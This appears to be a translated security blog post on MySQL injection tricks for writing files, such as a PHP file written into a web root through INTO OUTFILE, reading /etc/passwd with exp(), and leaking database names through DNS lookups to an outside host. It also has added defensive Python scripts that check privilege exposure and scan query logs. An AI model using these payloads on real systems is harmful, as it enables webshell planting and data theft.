MySQL Writing Shell tips

Source: Internet
Author: User
Tags: phpinfo, file permissions, hex code

Today, with my cousin's help, I finally sorted out the problem of importing and exporting files (it was, of course, a simple matter). Since then I have re-tested the points from the most recent articles myself, and I'm recording them here along the way.
1. Tips for writing files with UNION when the MySQL database supports it:

With a regular UNION write, you can see that the placeholders for the preceding fields are written to the file as well, and replacing them with NULL gives the same result. For writing a shell this is not a big problem, but it becomes one when writing a bat, mof or vbs file and so on. So how do you get rid of them and write only what we need? Hex encoding works well.

Hex-encode the content we want to write and split it across the fields, one segment per field, so that only what we need ends up in the file.

2. Writing files when UNION is not supported. Many people do not know this method and assume that writing content requires UNION support; I saw an article showing that this method does not need it.
Syntax: SELECT * FROM admin WHERE id=1 INTO OUTFILE 'F:\WWW\phpinfo.php' FIELDS TERMINATED BY '<?php phpinfo();?>'%23

You can see that the write succeeds, but this method has a drawback: the query must return at least two rows for any content to be written, and the number of copies of the content written = rows returned - 1.

As you can see, the write fails when we make the preceding data error out.
Look at the situation in sqlmap:

It is obvious that sqlmap also writes using this method. (To capture sqlmap's packets with Burp, add --proxy "http://127.0.0.1:8080/" and the request can be seen in Burp.)

Of course, you can also see that the file is written through the regular UNION.
Also worth attaching is the function exp(). It can also be used to read files, but a write through it can only produce a file containing a single 0, so it has to be combined with other exploitation, such as file overwriting.
Read a file:
select exp(~(select*from(select load_file('/etc/passwd'))));
Write a file:
select exp(~(select*from(select 'hello')a)) into outfile 'c:/out.txt'; but only a single 0 is written.
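Every write in sections 1 and 2 (the UNION write, the FIELDS TERMINATED BY write and the exp() write) depends on the same two server-side conditions: the injected account holds the global FILE privilege, and secure_file_priv does not confine INTO OUTFILE to a directory outside the web root. The following Python script is an added example for this post (it is not from the original author) that a DBA can use to assess those conditions from the output of SHOW VARIABLES LIKE 'secure_file_priv' and SHOW GRANTS FOR the application account. The function names, the grant strings and the paths in the sample run are constructed for the example; the inputs are pasted in rather than fetched from a live server.

```python
import re
from pathlib import PurePosixPath, PureWindowsPath

# One line per row of SHOW GRANTS FOR 'app'@'host'. FILE is a global privilege,
# so only grants ON *.* can confer it (directly or via ALL PRIVILEGES).
GRANT_RE = re.compile(r"^GRANT\s+(.+?)\s+ON\s+(\S+)\s+TO\b", re.I)
FILE_GRANTS = {"FILE", "ALL", "ALL PRIVILEGES"}


def _pure(path):
    # Pick the path flavour from the string itself, so a Windows value such as
    # F:\WWW is compared correctly even when this script runs on Linux.
    if re.match(r"^[A-Za-z]:", path) or "\\" in path:
        return PureWindowsPath(path)
    return PurePosixPath(path)


def _is_within(child, parent):
    # True when child lies inside parent (or equals it).
    try:
        _pure(child).relative_to(_pure(parent))
    except (ValueError, TypeError):
        return False
    return True


def has_file_privilege(grant_lines):
    for line in grant_lines:
        m = GRANT_RE.match(line.strip())
        if m and m.group(2) == "*.*":
            privs = {p.strip().upper() for p in m.group(1).split(",")}
            if privs & FILE_GRANTS:
                return True
    return False


def assess_file_privileges(secure_file_priv, grant_lines, webroot):
    """secure_file_priv is the Value column of SHOW VARIABLES LIKE 'secure_file_priv':
    NULL disables LOAD_FILE/INTO OUTFILE entirely, '' leaves them unrestricted,
    and a directory confines them to that directory."""
    file_priv = has_file_privilege(grant_lines)
    value = "NULL" if secure_file_priv is None else secure_file_priv.strip()
    if value.upper() == "NULL":
        file_ops = "disabled"
    elif value == "":
        file_ops = "unrestricted"
    else:
        file_ops = "restricted"

    # A webshell write needs FILE plus a secure_file_priv that reaches the web root.
    webroot_writable = file_priv and (
        file_ops == "unrestricted"
        or (file_ops == "restricted" and _is_within(webroot, value))
    )
    if not file_priv or file_ops == "disabled":
        risk = "low"
    elif webroot_writable:
        risk = "high"
    else:
        risk = "medium"
    return {
        "file_priv": file_priv,
        "file_ops": file_ops,
        "webroot_writable": webroot_writable,
        "risk": risk,
    }


if __name__ == "__main__":
    # Constructed inputs: a typical over-privileged web application account.
    grants = ["GRANT ALL PRIVILEGES ON *.* TO 'webapp'@'localhost'"]
    print(assess_file_privileges("", grants, "/var/www/html"))
    print(assess_file_privileges("/var/lib/mysql-files/", grants, "/var/www/html"))
    print(assess_file_privileges("NULL", grants, "/var/www/html"))
```

When the result is "high", the remediation is the pair REVOKE FILE ON *.* FROM 'webapp'@'localhost'; (the application account should normally hold only per-database SELECT/INSERT/UPDATE/DELETE) and secure_file_priv=NULL under [mysqld] in my.cnf, or a directory that the web server never serves; both LOAD_FILE() and INTO OUTFILE, including the exp() variant above, are governed by these same settings.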


3. Using DNS resolution to make blind injection easier.
First look at the load_file() function, which can be used to trigger a DNS resolution request.
Then use a statement like: select id from admin where id=1 and if((select load_file(concat('\\\\',(select database()),'.ceye.io\\abc'))),1,1);
The value of database() is successfully resolved as the leading part of the domain name. The precondition is that the file read privilege is available, which in real engagements is the case in about 30% of targets or so.
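All three sections leave a distinctive trace in the server's general query log: INTO OUTFILE or INTO DUMPFILE, a FIELDS TERMINATED BY clause carrying a script tag, a hex literal that decodes to one, exp(~...) wrapped around a subquery, and load_file() called on a UNC path that starts with two backslashes (the DNS trick from section 3). The following Python scanner is an added example for this post, not the author's code: it runs those rules over a few constructed general_log lines (the tab-separated format mysqld writes with log_output=FILE; the lines, the thread ids and the .example hostname are invented for the example) and reports which technique each line matches.

```python
import re

# Constructed sample of MySQL general_log lines; these are invented for the
# example, not real traffic. The out-of-band hostname uses the reserved
# .example TLD as a placeholder.
SAMPLE_LOG = """\
2024-05-01T10:00:01.000000Z\t   12 Query\tSELECT id, name FROM admin WHERE id=1
2024-05-01T10:00:02.000000Z\t   12 Query\tSELECT id, name FROM admin WHERE id=1 UNION SELECT NULL, 0x3c3f70687020706870696e666f28293b203f3e INTO OUTFILE '/var/www/html/phpinfo.php'
2024-05-01T10:00:03.000000Z\t   12 Query\tSELECT * FROM admin WHERE id=1 INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>'
2024-05-01T10:00:04.000000Z\t   12 Query\tSELECT exp(~(SELECT * FROM (SELECT load_file('/etc/passwd'))a))
2024-05-01T10:00:05.000000Z\t   12 Query\tSELECT id FROM admin WHERE id=1 AND IF((SELECT load_file(concat('\\\\\\\\',(SELECT database()),'.oob.example\\\\abc'))),1,1)
2024-05-01T10:00:06.000000Z\t   13 Query\tSELECT COUNT(*) FROM orders WHERE status='paid'
"""

# general_log line: <timestamp> <thread id> Query <statement>
LOG_LINE = re.compile(r"^\S+\s+\d+\s+Query\s+(.*)$")
FILE_WRITE = re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\b", re.I)
FILE_READ = re.compile(r"\bLOAD_FILE\s*\(", re.I)
UNC_PATH = re.compile(r"\\\\")  # two consecutive backslashes in the query text
ERROR_BASED = re.compile(r"\bEXP\s*\(\s*~", re.I)
HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]{8,})\b")
SCRIPT_MARKER = re.compile(r"<\?|<script", re.I)


def decoded_hex_literals(query):
    """Decode long 0x... literals so a hex-encoded payload is inspected as text."""
    out = []
    for h in HEX_LITERAL.findall(query):
        if len(h) % 2 == 0:
            out.append(bytes.fromhex(h).decode("latin-1"))
    return out


def scan_query(query):
    """Return the sorted list of technique tags that match one statement."""
    tags = set()
    if FILE_WRITE.search(query):
        tags.add("file_write")
    if FILE_READ.search(query):
        tags.add("file_read")
        # load_file() on a \\host\share path makes the server resolve the host name.
        if UNC_PATH.search(query):
            tags.add("oob_dns")
    if ERROR_BASED.search(query):
        tags.add("error_based")
    texts = [query] + decoded_hex_literals(query)
    if any(SCRIPT_MARKER.search(t) for t in texts):
        tags.add("webshell_marker")
    return sorted(tags)


def scan_log(lines):
    """Scan general_log lines; return one finding per statement that matched."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_LINE.match(line)
        if not m:
            continue
        tags = scan_query(m.group(1))
        if tags:
            findings.append({"line": n, "tags": tags, "query": m.group(1)})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"line {f['line']}: {', '.join(f['tags'])}")
```

The general log is expensive in production, so the same rules are usually applied to audit-plugin output or to the web server's access log (where the hex literal and the INTO OUTFILE keyword appear URL-encoded); a file_write or oob_dns hit from an application account is worth an immediate look, since legitimate application code almost never issues those statements.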

Command execution is also supported in the same way, for example:


The principle is similar in practice: wherever command execution might exist, ping followed by a domain name can be used to check whether the command actually ran.
I originally wrote this as a note to keep for myself, and am sharing it along the way.
Related information:
https://ricterz.me/posts/%E7%AC% ... Injection%20attacks
https://bbs.ichunqiu.com/thread-22002-1-1.html
http://lu4n.com/mysql-sqli-write-webshell-two-methods/
